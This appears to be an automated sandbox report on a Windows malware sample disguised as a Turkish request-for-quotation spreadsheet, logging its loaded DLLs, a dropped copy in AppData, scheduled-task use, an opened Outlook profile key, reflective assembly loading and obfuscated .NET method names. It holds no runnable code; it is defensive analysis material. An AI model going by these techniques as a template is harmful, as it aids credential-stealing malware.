Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\qovDEn.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, qB75hHcSQCiCj2fkFb.cs	.Net Code: CyRMq9dDDb System.Reflection.Assembly.Load(byte[])
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, qB75hHcSQCiCj2fkFb.cs	.Net Code: CyRMq9dDDb System.Reflection.Assembly.Load(byte[])

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe

Static PE information: 0xA915495B [Sat Nov 22 16:35:39 2059 UTC]

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_0785023F pushad ; ret	1_2_07850252
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_0785025B pushad ; ret	1_2_07850252
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07850273 pushad ; ret	1_2_0785027A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07850040 pushad ; ret	1_2_07850232
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07850BC8 push 68A007C3h; ret	1_2_07850BCE
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 1_2_07850AD8 push esp; ret	1_2_07850AD9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_02E59C30 push esp; retf 02E7h	10_2_02E59D55
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C39241 push es; ret	10_2_06C39244
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C387E7 pushad ; ret	10_2_06C387EA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3878F push esi; ret	10_2_06C38792
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38753 push edx; ret	10_2_06C3875E
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3875F push edx; ret	10_2_06C38762
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38767 push bx; ret	10_2_06C3876E
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38765 push edx; ret	10_2_06C38766
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C3877B push ebx; ret	10_2_06C3877E
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C38803 push 688706C3h; ret	10_2_06C38816
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Code function: 10_2_06C32DBE pushfd ; retf	10_2_06C32DC1

Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe	Static PE information: section name: .text entropy: 7.7640586341076805
Source: qovDEn.exe.1.dr	Static PE information: section name: .text entropy: 7.7640586341076805

Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, sh9SyiotnPcmQ8vROw.cs	High entropy of concatenated method names: 'ToString', 'M1OJRId6Wl', 'ALOJvqWBKc', 'VHPJG6SF0a', 'VDjJ5DjmHo', 'I5bJl12xtf', 'StLJd2LGIg', 'lZhJhu8WwO', 'WyBJi71rd7', 'kKIJuNbiVr'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, blaYaG7AldhtNoNFv8.cs	High entropy of concatenated method names: 'G8QaP2MprD', 'qvBabKK9Ha', 'FKyaMWCTGx', 'xVrajp1pPJ', 't2HaVGvm3p', 'iIqa2qAmuU', 'E8jagW4wRA', 'T86rZ8s7cS', 'tMrrkSjfnR', 'uWirUFZu4H'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, o5llIGfw7Gd2u9sFue.cs	High entropy of concatenated method names: 'Mb81F5FNLA', 'L8o1Br23Gv', 'ToString', 'JiW1jrGgdU', 'ADb1Vk94fW', 'yX41YGA3wG', 'MP512cgE3H', 'obq1go6MtD', 'h7n1ePtYri', 'Xs91cJjv6S'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, GX4B5TkHCv6r0CFUV1.cs	High entropy of concatenated method names: 'yEBrjygab0', 'YihrVppBfE', 'MGTrYPCQYT', 'MAer2cTBS6', 'Ri5rgeHVuA', 'hw3reUryKL', 'bQRrckV247', 'wJvrXvLuAZ', 'fWYrFnCtKy', 'jThrBdykmg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, P8qxKKMJXKiHiir1lY.cs	High entropy of concatenated method names: 'kNbPeunKBC', 'I53PcM1W4q', 'JY3PFwnLKD', 'srrPBZRkwC', 'uS6P38k3p8', 'F9KPJZSubx', 'Q2eHOraoMmxfV3ZVJl', 'DKyW9ywDWx6e6TlOfs', 'XYnPP9boei', 'BlMPbMDrCM'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, qB75hHcSQCiCj2fkFb.cs	High entropy of concatenated method names: 'M6tbxmyiji', 'IHgbjp1Tdb', 'n9hbVIHahY', 'hJmbY1RrGj', 'X9gb2kbHHd', 'c0ObgJr4Qu', 'xrcbew5XAR', 'CkdbcwOcIM', 'ujnbXXNWV1', 'fyTbFCiMLT'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, Kvab9VuZGqr2NOVR0X.cs	High entropy of concatenated method names: 'iBienoTK5y', 'GqIeIsZO62', 'a5Veq3OKAu', 'L7de0eJnQ6', 'CmqeC8QPkx', 'NFUe9N1JGJ', 'AemeyyeTgM', 'aYfeppTNCH', 'dEAeAvgVck', 'TNSeShS5ka'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, Axc2pjPbsjT8lF9hiXf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wcgOTWJHuZ', 'Y2uODl1hOg', 'NigOoQJO5O', 'mKhOfV95T9', 'QvCOL3NVq4', 'iorOK3hMGM', 'OhROZRFhKg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, YfX6kRtYhki4MROEnL.cs	High entropy of concatenated method names: 'OG7HpDyZjp', 'I0aHAiQN76', 'btaH6Sw9Ou', 'BnZHvVuwiK', 'wc5H5c9USt', 's3mHlbAY29', 'HfIHhA3Wbd', 'My6Hip5DJS', 'eI8HstAhJY', 'KjcHRfPV26'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, UUaRtiEH1qkZgLcCSK.cs	High entropy of concatenated method names: 'Cu3qXsUDk', 'oao0OflXi', 'Dpu9tThYj', 'QgHyOUp2t', 'TTmA3yRAp', 'k8DS9s75F', 'OsutjrG0SCDCebhKR8', 'WuGyG3lgRuT4CH0WGC', 'eiXryATJl', 'NLJOwirw0'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, gjjnn1YciVTBXEdTFd.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'PiXEUJxTcr', 'fOyE7UUk9D', 'FdyEz0K2fW', 'LBSbW61ets', 'nXibPwftMx', 'JsnbEnlbIb', 'UoSbbyg9U6', 'UwDBI4z406SE5NTrCD'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, WJo1XlAY3wnLKDarrZ.cs	High entropy of concatenated method names: 'n1lY0WThYF', 'e0EY9plCtK', 'v8dYpbGk8U', 'rYjYAvdt1X', 'yojY32wroA', 'clhYJ3AKUH', 'X48Y1qjWDF', 'kMlYryLNe5', 'DrbYaOi4lv', 'mFbYOZuamL'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, BbAyteVmtin9f82xbc.cs	High entropy of concatenated method names: 'Dispose', 'COgPUGrVr5', 'D34EvEXo5l', 'wiIxxvjNoV', 'i6XP74B5TH', 'Bv6Pzr0CFU', 'ProcessDialogKey', 'g1TEWjfeHf', 'WfvEPLBqV3', 'AEEEEElaYa'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, op8S9K6ZSubxGmm5E0.cs	High entropy of concatenated method names: 'YGHgxZJ7Np', 'VuLgV8gerC', 'wDpg2GBddb', 'K7MgeMaEqe', 'WYGgcGMioE', 'KJW2LTmioT', 'bqt2KYSD0r', 'OI72ZEnTPA', 'O3r2kZ3yHF', 'OrB2UXDlpg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, QjfeHfUZfvLBqV30EE.cs	High entropy of concatenated method names: 'BYIr6Schdr', 'q0qrvggVki', 'ccjrGpfXWJ', 'Fb7r50YodU', 'dxKrTmruZX', 'QbJrlfeb59', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, zli3MhTQgWh6egod3Z.cs	High entropy of concatenated method names: 'D1O3sr1nul', 'zm43Q8CPVG', 'bdj3TBljWU', 'u9O3DVjHxv', 'Svu3vVPCts', 'gZS3GAt1EE', 'oS9355C0SW', 'zsi3lBgTkU', 'cg03dQO3Sk', 'qc33hIGQCb'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, OkwC80SxyQmnamS68k.cs	High entropy of concatenated method names: 'CCW2Csyhd5', 'G9s2ysZV5l', 'pK3YG5wiCI', 'at1Y50gOi1', 'w4UYlBPUSr', 'cfQYdrntvx', 'xSAYhr9uin', 'vQiYiuyIYd', 'h44Yuka9UL', 'rNiYs6S3TB'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, tFQgfTPWLBakuuJYD38.cs	High entropy of concatenated method names: 'nh3anLWYyx', 'JteaIUamkP', 'j8WaqgZKsE', 'ylua02jISC', 'fE3aCtcO0x', 'NJia9YAt1v', 'zpWayW5QRg', 'NSnapOvcQf', 'HQDaAdpgfh', 'seEaSF2jwW'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, cunKBCp553M1W4qgFC.cs	High entropy of concatenated method names: 'QtGVTgBUc4', 'noOVDR23i7', 'IPTVoW1hXs', 'rDVVflXfrm', 'g9iVLULFqp', 'uHcVKchTMZ', 'VcuVZY5fWs', 'N9vVkbKKhl', 'QvdVULNElp', 'vwMV7eFTP7'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, X3eb5BKtGDC2CdsO3V.cs	High entropy of concatenated method names: 'u4e1kI9k93', 'XOt17E586u', 'xDtrW8EVpt', 'JiirPfRbo0', 'AXf1Rm2H8o', 'M8P1Q8RnZU', 'uNa1tfXqgF', 'TNm1TCfP2J', 'qt61DZ6XFW', 'Rdm1o0FQ6p'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, aofADfPPkpW5SDRnC4G.cs	High entropy of concatenated method names: 'ToString', 'RvjObJwob5', 'WAWOMo6UYC', 'zSpOxA9XhZ', 'MVsOjISpw3', 'Q4qOVueWH8', 'HQ7OYgyaRc', 'cEXO24ESUJ', 'MCSsnX7XjwD6eoL5TtV', 'zGE69p7YxRRAyfVOC0E'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.7c40000.5.raw.unpack, yTXnnEhR5An0b1BMbv.cs	High entropy of concatenated method names: 'GWQej58Pef', 'Y2ZeYixsLf', 'lTnegXrYnw', 'VrKg7vxbsS', 'ds7gzqEjEU', 'hOIeWaJyPo', 'n68ePZktoN', 'Hb4eEyngZm', 'YZBebmD3qq', 'KmaeM007OE'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, sh9SyiotnPcmQ8vROw.cs	High entropy of concatenated method names: 'ToString', 'M1OJRId6Wl', 'ALOJvqWBKc', 'VHPJG6SF0a', 'VDjJ5DjmHo', 'I5bJl12xtf', 'StLJd2LGIg', 'lZhJhu8WwO', 'WyBJi71rd7', 'kKIJuNbiVr'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, blaYaG7AldhtNoNFv8.cs	High entropy of concatenated method names: 'G8QaP2MprD', 'qvBabKK9Ha', 'FKyaMWCTGx', 'xVrajp1pPJ', 't2HaVGvm3p', 'iIqa2qAmuU', 'E8jagW4wRA', 'T86rZ8s7cS', 'tMrrkSjfnR', 'uWirUFZu4H'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, o5llIGfw7Gd2u9sFue.cs	High entropy of concatenated method names: 'Mb81F5FNLA', 'L8o1Br23Gv', 'ToString', 'JiW1jrGgdU', 'ADb1Vk94fW', 'yX41YGA3wG', 'MP512cgE3H', 'obq1go6MtD', 'h7n1ePtYri', 'Xs91cJjv6S'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, GX4B5TkHCv6r0CFUV1.cs	High entropy of concatenated method names: 'yEBrjygab0', 'YihrVppBfE', 'MGTrYPCQYT', 'MAer2cTBS6', 'Ri5rgeHVuA', 'hw3reUryKL', 'bQRrckV247', 'wJvrXvLuAZ', 'fWYrFnCtKy', 'jThrBdykmg'
Source: 1.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.exe.42c0ef0.1.raw.unpack, P8qxKKMJXKiHiir1lY.cs	High entropy of concatenated method names: 'kNbPeunKBC', 'I53PcM1W4q', 'JY3PFwnLKD', 'srrPBZRkwC', 'uS6P38k3p8', 'F9KPJZSubx', 'Q2eHOraoMmxfV3ZVJl', 'DKyW9ywDWx6e6TlOfs', 'XYnPP9boei', 'BlMPbMDrCM'
